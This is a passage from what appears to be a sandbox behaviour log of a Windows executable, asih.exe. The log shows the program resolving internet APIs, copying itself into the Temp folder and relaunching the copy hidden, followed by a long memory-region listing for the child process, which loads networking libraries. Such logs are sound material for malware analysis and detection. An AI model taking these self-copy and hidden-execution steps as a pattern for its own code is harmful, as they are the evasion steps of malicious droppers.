(hModule=0x715c0000, lpProcName="HttpOpenRequestW") returned 0x71640fd0 [0124.319] GetProcAddress (hModule=0x715c0000, lpProcName="HttpQueryInfoW") returned 0x7168f060 [0124.320] GetProcAddress (hModule=0x715c0000, lpProcName="InternetReadFile") returned 0x71647320 [0124.320] GetProcAddress (hModule=0x715c0000, lpProcName="InternetConnectW") returned 0x716745f0 [0124.320] GetProcAddress (hModule=0x715c0000, lpProcName="InternetOpenW") returned 0x71688490 [0124.320] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x770a0000 [0124.320] GetProcAddress (hModule=0x770a0000, lpProcName="GetTempPathW") returned 0x770c6b30 [0124.320] GetProcAddress (hModule=0x770a0000, lpProcName="GetFileSize") returned 0x770c6a70 [0124.320] GetProcAddress (hModule=0x770a0000, lpProcName="GetCurrentDirectoryW") returned 0x770ba9a0 [0124.320] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteFileW") returned 0x770c68c0 [0124.321] GetProcAddress (hModule=0x770a0000, lpProcName="CloseHandle") returned 0x770c6630 [0124.321] GetProcAddress (hModule=0x770a0000, lpProcName="WriteFile") returned 0x770c6ca0 [0124.321] GetProcAddress (hModule=0x770a0000, lpProcName="lstrcmpW") returned 0x770b7970 [0124.321] GetProcAddress (hModule=0x770a0000, lpProcName="ReadFile") returned 0x770c6bb0 [0124.321] GetProcAddress (hModule=0x770a0000, lpProcName="GetModuleHandleW") returned 0x770b9bc0 [0124.321] GetProcAddress (hModule=0x770a0000, lpProcName="ExitProcess") returned 0x770c7b30 [0124.321] GetProcAddress (hModule=0x770a0000, lpProcName="HeapCreate") returned 0x770ba100 [0124.321] GetProcAddress (hModule=0x770a0000, lpProcName="HeapAlloc") returned 0x77252bd0 [0124.322] GetProcAddress (hModule=0x770a0000, lpProcName="GetModuleFileNameW") returned 0x770b9b00 [0124.322] GetProcAddress (hModule=0x770a0000, lpProcName="CreateFileW") returned 0x770c6890 [0124.322] GetProcAddress (hModule=0x770a0000, lpProcName="lstrlenW") returned 0x770b3690 [0124.322] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74c10000 [0124.322] GetProcAddress (hModule=0x74c10000, lpProcName="wsprintfW") returned 0x74c3f890 [0124.322] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75ca0000 [0125.704] GetProcAddress (hModule=0x75ca0000, lpProcName="ShellExecuteW") returned 0x75e3d9f0 [0125.704] VirtualProtect (in: lpAddress=0x460000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff1c | out: lpflOldProtect=0x19ff1c*=0x4) returned 1 [0125.704] VirtualProtect (in: lpAddress=0x461000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x19fea0 | out: lpflOldProtect=0x19fea0*=0x4) returned 1 [0125.706] VirtualProtect (in: lpAddress=0x462000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x19fea0 | out: lpflOldProtect=0x19fea0*=0x4) returned 1 [0125.706] VirtualProtect (in: lpAddress=0x463000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19fea0 | out: lpflOldProtect=0x19fea0*=0x4) returned 1 [0125.706] VirtualProtect (in: lpAddress=0x464000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x19fea0 | out: lpflOldProtect=0x19fea0*=0x4) returned 1 [0125.707] VirtualProtect (in: lpAddress=0x465000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x19fea0 | out: lpflOldProtect=0x19fea0*=0x4) returned 1 [0125.707] VirtualFree (lpAddress=0x450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.722] GetModuleHandleW (lpModuleName=0x0) returned 0x460000 [0125.722] HeapCreate (flOptions=0x0, dwInitialSize=0x2000, dwMaximumSize=0x0) returned 0x2240000 [0125.723] RtlAllocateHeap (HeapHandle=0x2240000, Flags=0x8, Size=0x2000) returned 0x22405a8 [0125.723] RtlAllocateHeap (HeapHandle=0x2240000, Flags=0x8, Size=0x2000) returned 0x22425b0 [0125.723] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x22405a8, nSize=0x2000 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\asih.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\asih.exe")) returned 0x26 [0125.723] GetTempPathW (in: nBufferLength=0x1000, lpBuffer=0x22425b0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0125.724] wsprintfW (in: param_1=0x22425b0, param_2="%s%s" | out: param_1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\asih.exe") returned 45 [0125.724] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\asih.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\asih.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0125.724] GetFileSize (in: hFile=0x190, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbe24 [0125.724] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\asih.exe") returned 38 [0125.724] RtlAllocateHeap (HeapHandle=0x2240000, Flags=0x8, Size=0xbe74) returned 0x20f0048 [0125.725] ReadFile (in: hFile=0x190, lpBuffer=0x20f0048, nNumberOfBytesToRead=0xbe24, lpNumberOfBytesRead=0x19ff74, lpOverlapped=0x0 | out: lpBuffer=0x20f0048*, lpNumberOfBytesRead=0x19ff74*=0xbe24, lpOverlapped=0x0) returned 1 [0125.725] lstrcmpW (lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\asih.exe", lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\asih.exe") returned 1 [0125.729] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\asih.exe") returned 38 [0125.729] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\asih.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\asih.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0125.730] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\asih.exe") returned 38 [0125.730] WriteFile (in: hFile=0x198, lpBuffer=0x20f0048*, nNumberOfBytesToWrite=0xbe74, lpNumberOfBytesWritten=0x19ff74, lpOverlapped=0x0 | out: lpBuffer=0x20f0048*, lpNumberOfBytesWritten=0x19ff74*=0xbe74, lpOverlapped=0x0) returned 1 [0125.732] CloseHandle (hObject=0x190) returned 1 [0125.733] CloseHandle (hObject=0x198) returned 1 [0125.736] GetTempPathW (in: nBufferLength=0x1000, lpBuffer=0x22405a8 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0125.736] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\asih.exe", lpParameters=0x0, lpDirectory="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", nShowCmd=0) returned 0x2a [0126.471] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0x1320 Thread: id = 3 os_tid = 0x133c Thread: id = 4 os_tid = 0x11d4 Thread: id = 5 os_tid = 0x13ac Thread: id = 6 os_tid = 0x13e4 Thread: id = 7 os_tid = 0x13e0 Process: id = "2" image_name = "asih.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\asih.exe" page_root = "0x5188f000" os_pid = "0x13dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x131c" cmd_line = "\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\asih.exe\" " cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ebd3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 367 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 368 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 369 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 370 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 371 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 372 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 373 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 374 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 375 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 376 start_va = 0x500000 end_va = 0x509fff monitored = 1 entry_point = 0x501000 region_type = mapped_file name = "asih.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\asih.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\asih.exe") Region: id = 377 start_va = 0x77220000 end_va = 0x7739afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 378 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 379 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 380 start_va = 0x7fff0000 end_va = 0x7ffff079ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 381 start_va = 0x7ffff07a0000 end_va = 0x7ffff0960fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 382 start_va = 0x7ffff0961000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffff0961000" filename = "" Region: id = 383 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 384 start_va = 0x656f0000 end_va = 0x6573ffff monitored = 0 entry_point = 0x65708180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 385 start_va = 0x65670000 end_va = 0x656e9fff monitored = 0 entry_point = 0x65683290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 386 start_va = 0x770a0000 end_va = 0x7717ffff monitored = 0 entry_point = 0x770b3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 387 start_va = 0x65740000 end_va = 0x65747fff monitored = 0 entry_point = 0x657417c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 388 start_va = 0x510000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 389 start_va = 0x770a0000 end_va = 0x7717ffff monitored = 0 entry_point = 0x770b3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 390 start_va = 0x74920000 end_va = 0x74a9dfff monitored = 0 entry_point = 0x749d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 391 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 392 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 393 start_va = 0x510000 end_va = 0x5cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 394 start_va = 0x690000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 395 start_va = 0x73ea0000 end_va = 0x73f31fff monitored = 0 entry_point = 0x73ee0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 396 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 397 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 398 start_va = 0x74c10000 end_va = 0x74d56fff monitored = 0 entry_point = 0x74c21cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 399 start_va = 0x74250000 end_va = 0x7439efff monitored = 0 entry_point = 0x74306820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 400 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 401 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 402 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 403 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 404 start_va = 0x890000 end_va = 0xa17fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 405 start_va = 0x757e0000 end_va = 0x7580afff monitored = 0 entry_point = 0x757e5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 406 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 407 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 408 start_va = 0xa20000 end_va = 0xba0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 409 start_va = 0xbb0000 end_va = 0x1faffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bb0000" filename = "" Region: id = 410 start_va = 0x73e20000 end_va = 0x73e94fff monitored = 0 entry_point = 0x73e59a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 411 start_va = 0x75640000 end_va = 0x756fdfff monitored = 0 entry_point = 0x75675630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 412 start_va = 0x75420000 end_va = 0x755dcfff monitored = 0 entry_point = 0x75502a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 413 start_va = 0x75ad0000 end_va = 0x75b7cfff monitored = 0 entry_point = 0x75ae4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 414 start_va = 0x73f50000 end_va = 0x73f6dfff monitored = 0 entry_point = 0x73f5b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 415 start_va = 0x73f40000 end_va = 0x73f49fff monitored = 0 entry_point = 0x73f42a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 416 start_va = 0x755e0000 end_va = 0x75637fff monitored = 0 entry_point = 0x756225c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 417 start_va = 0x75900000 end_va = 0x75943fff monitored = 0 entry_point = 0x75919d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 418 start_va = 0x5d0000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 419 start_va = 0x1fb0000 end_va = 0x211ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 420 start_va = 0x75b80000 end_va = 0x75c9efff monitored = 0 entry_point = 0x75bc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 421 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 422 start_va = 0x1fb0000 end_va = 0x206bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fb0000" filename = "" Region: id = 423 start_va = 0x2110000 end_va = 0x211ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 424 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 425 start_va = 0x73e00000 end_va = 0x73e1cfff monitored = 0 entry_point = 0x73e03b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 426 start_va = 0x480000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 427 start_va = 0x1f0000 end_va = 0x1f5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 428 start_va = 0x440000 end_va = 0x445fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 429 start_va = 0x1e0000 end_va = 0x1e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 430 start_va = 0x450000 end_va = 0x454fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 431 start_va = 0x460000 end_va = 0x465fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 432 start_va = 0x715c0000 end_va = 0x717ccfff monitored = 0 entry_point = 0x716aacb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 433 start_va = 0x74e30000 end_va = 0x74e74fff monitored = 0 entry_point = 0x74e4de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 434 start_va = 0x75ca0000 end_va = 0x7709efff monitored = 0 entry_point = 0x75e5b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 435 start_va = 0x758c0000 end_va = 0x758f6fff monitored = 0 entry_point = 0x758c3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 436 start_va = 0x74f10000 end_va = 0x75408fff monitored = 0 entry_point = 0x75117610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 437 start_va = 0x75a50000 end_va = 0x75acafff monitored = 0 entry_point = 0x75a6e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 438 start_va = 0x75410000 end_va = 0x7541bfff monitored = 0 entry_point = 0x75413930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 439 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 440 start_va = 0x74d60000 end_va = 0x74da3fff monitored = 0 entry_point = 0x74d67410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 441 start_va = 0x74f00000 end_va = 0x74f0efff monitored = 0 entry_point = 0x74f02e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 442 start_va = 0x2120000 end_va = 0x22cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 443 start_va = 0x1fb0000 end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 444 start_va = 0x22d0000 end_va = 0x2606fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 445 start_va = 0x73b30000 end_va = 0x73dfafff monitored = 0 entry_point = 0x73d6c4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 446 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 447 start_va = 0x74820000 end_va = 0x748b1fff monitored = 0 entry_point = 0x74858cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 448 start_va = 0x2120000 end_va = 0x2209fff monitored = 0 entry_point = 0x215d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 449 start_va = 0x22c0000 end_va = 0x22cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022c0000" filename = "" Region: id = 450 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 451 start_va = 0x660000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 452 start_va = 0x74db0000 end_va = 0x74e0efff monitored = 0 entry_point = 0x74db4af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 453 start_va = 0x71570000 end_va = 0x71581fff monitored = 0 entry_point = 0x71574510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 454 start_va = 0x71540000 end_va = 0x7156efff monitored = 0 entry_point = 0x7154bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 455 start_va = 0x714a0000 end_va = 0x7153afff monitored = 0 entry_point = 0x714df7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 456 start_va = 0x5e0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 457 start_va = 0x2120000 end_va = 0x221ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 458 start_va = 0x71450000 end_va = 0x7149efff monitored = 0 entry_point = 0x7145d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 459 start_va = 0x71440000 end_va = 0x71447fff monitored = 0 entry_point = 0x71441fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 460 start_va = 0x747b0000 end_va = 0x747b6fff monitored = 0 entry_point = 0x747b1e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 461 start_va = 0x620000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 462 start_va = 0x2610000 end_va = 0x270ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 463 start_va = 0x70aa0000 end_va = 0x70b23fff monitored = 0 entry_point = 0x70ac6530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 464 start_va = 0x717d0000 end_va = 0x7194dfff monitored = 0 entry_point = 0x7184c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 465 start_va = 0x670000 end_va = 0x670fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 466 start_va = 0x20b0000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 467 start_va = 0x2710000 end_va = 0x280ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 468 start_va = 0x680000 end_va = 0x680fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 469 start_va = 0x75700000 end_va = 0x75783fff monitored = 0 entry_point = 0x75726220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 470 start_va = 0x20f0000 end_va = 0x20f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 